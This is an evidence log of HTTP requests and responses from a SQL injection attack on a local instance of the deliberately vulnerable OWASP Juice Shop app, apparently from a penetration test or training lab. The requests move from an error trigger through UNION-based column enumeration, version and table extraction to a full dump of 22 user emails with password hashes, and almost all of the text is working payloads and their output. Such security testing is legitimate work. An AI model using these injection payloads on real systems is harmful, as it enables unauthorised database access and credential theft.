=== EVIDENCE COLLECTION ===

--- REQUEST 1: Baseline ---
GET /rest/products/search?q=apple HTTP/1.1
Host: localhost:3000

--- RESPONSE 1: Baseline ---
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
Content-Length: 631
ETag: W/"277-r4HzisnohnAYHhxFHnX+TPRwrKw"
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"status":"success","data":[{"id":1,"name":"Apple Juice (1000ml)","description":"The all-time classic.","price":1.99,"deluxePrice":0.99,"image":"apple_juice.jpg","createdAt":"2026-04-11 20:32:04.832 +00:00","updatedAt":"2026-04-11 20:32:04.832 +00:00","deletedAt":null},{"id":24,"name":"Apple Pomace","description":"Finest pressings of apples. Allergy disclaimer: Might contain traces of worms. Can be <a href=\"/#

--- REQUEST 2: Error-based SQLi trigger ---
GET /rest/products/search?q=%27%20OR%201%3D1-- HTTP/1.1
Host: localhost:3000

--- RESPONSE 2: SQLite error confirmation ---
HTTP/1.1 500 Internal Server Error
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Transfer-Encoding: chunked

<html>
  <head>
    <meta charset='utf-8'> 
    <title>Error: SQLITE_ERROR: incomplete input</title>
    <style>* {
  margin: 0;
  padding

--- REQUEST 3: UNION SELECT column enumeration ---
GET /rest/products/search?q=ZZZNOTFOUND'))%20UNION%20SELECT%201,2,3,4,5,6,7,8,9-- HTTP/1.1
Host: localhost:3000

--- RESPONSE 3: UNION SELECT (9 cols confirmed) ---
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
Content-Length: 145
ETag: W/"91-y1NK0HxzvUylW7xAQKvXlduqumQ"
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"status":"success","data":[{"id":1,"name":"2","description":"3","price":4,"deluxePrice":5,"image":6,"createdAt":7,"updatedAt":8,"deletedAt":9}]}

--- REQUEST 4: SQLite version extraction ---
GET /rest/products/search?q=ZZZNOTFOUND'))%20UNION%20SELECT%20sqlite_version(),2,3,4,5,6,7,8,9-- HTTP/1.1
Host: localhost:3000

--- RESPONSE 4: Version extracted ---
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
Content-Length: 152
ETag: W/"98-iWOVSJgs8UXViIeeEvGncrtNerM"
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"status":"success","data":[{"id":"3.44.2","name":"2","description":"3","price":4,"deluxePrice":5,"image":6,"create

--- REQUEST 5: Table name extraction ---
GET /rest/products/search?q=ZZZNOTFOUND'))%20UNION%20SELECT%20GROUP_CONCAT(tbl_name),2,3,4,5,6,7,8,9%20FROM%20sqlite_master%20WHERE%20type='table'-- HTTP/1.1
Host: localhost:3000

--- RESPONSE 5: All table names ---
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
Content-Length: 371
ETag: W/"173-D8cwu91hfrASws9klxGBl9945RE"
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"status":"success","data":[{"id":"Users,sqlite_sequence,Addresses,Baskets,Products,BasketItems,Captchas,Cards,Challenges,Complaints,Deliveries,Feedbacks,Hints,ImageCaptchas,Memories,PrivacyRequests,Quantities,Recycles,SecurityQuestions,SecurityAnswers,Wallets","name":"2","description":"3","price":4,"deluxePrice":5,"image":6,"createdAt":7,"updatedAt":8,"deletedAt":9}]}

--- REQUEST 6: CRITICAL - Full credential dump ---
GET /rest/products/search?q=ZZZNOTFOUND'))%20UNION%20SELECT%20GROUP_CONCAT(email||':'||password),2,3,4,5,6,7,8,9%20FROM%20Users-- HTTP/1.1
Host: localhost:3000

--- RESPONSE 6: 22 user credentials extracted ---
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Feature-Policy: payment 'self'
X-Recruiting: /#/jobs
Content-Type: application/json; charset=utf-8
Content-Length: 1287
ETag: W/"507-EengQAhUdYPcSAnRhg2cOqTPQ5I"
Vary: Accept-Encoding
Date: Sun, 12 Apr 2026 09:47:07 GMT
Connection: keep-alive
Keep-Alive: timeout=5

{"status":"success","data":[{"id":"admin@juice-sh.op:0192023a7bbd73250516f069df18b500,jim@juice-sh.op:e541ca7ecf72b8d1286474fc613e5e45,bender@juice-sh.op:0c36e517e3fa95aabf1bbffc6744a4ef,bjoern.kimminich@gmail.com:6edd9d726cbdc873c539e41ae8757b8c,ciso@juice-sh.op:861917d5fa5f1172f931dc700d81a8fb,support@juice-sh.op:3869433d74e3d0c86fd25562f836bc82,morty@juice-sh.op:f2f933d0bb0ba057bc8e33b8ebd6d9e8,mc.safesearch@juice-sh.op:b03f4b0ba8b458fa0acdc02cdb953bc8,J12934@juice-sh.op:3c2abc04e4a6ea8f1327d0aae3714b7d,wurstbrot@juice-sh.op:9ad5b0492bbe528583e128d2a8941de4,amy@juice-sh.op:030f05e45e30710c3ad3c32f00de0473,bjoern@juice-sh.op:7f311911af16fa8f418dd1a3051d6810,bjoern@owasp.org:9283f1b2e9669749081963be0462e466,chris.pike@juice-sh.op:10a783b9ed19ea1c67c3a27699f0095b,accountant@juice-sh.op:963e10f92a70b4b463220cb4c5d636dc,uvogin@juice-sh.op:05f92148b4b60f7dacd04cceebb8f1af,demo:fe01ce2a7fbac8fafaed7c982a04e229,john@juice-sh.op:00479e957b6b42c459ee5746478e4d45,emma@juice-sh.op:402f1c4a75e316afec5a6ea63147f739,stan@juice-sh.op:e9048a3f43dd5e094ef733f3bd88ea64,ethereum@juice-sh.op:2c17c6393771ee3048ae34d6b380c5ec,testing@juice-sh.op:b616a64605a07941fbd31868aea3b54b","name":"2","description":"3","price":4,"deluxePrice":5,"image":6,"createdAt":7,"updatedAt":8,"deletedAt":9}]}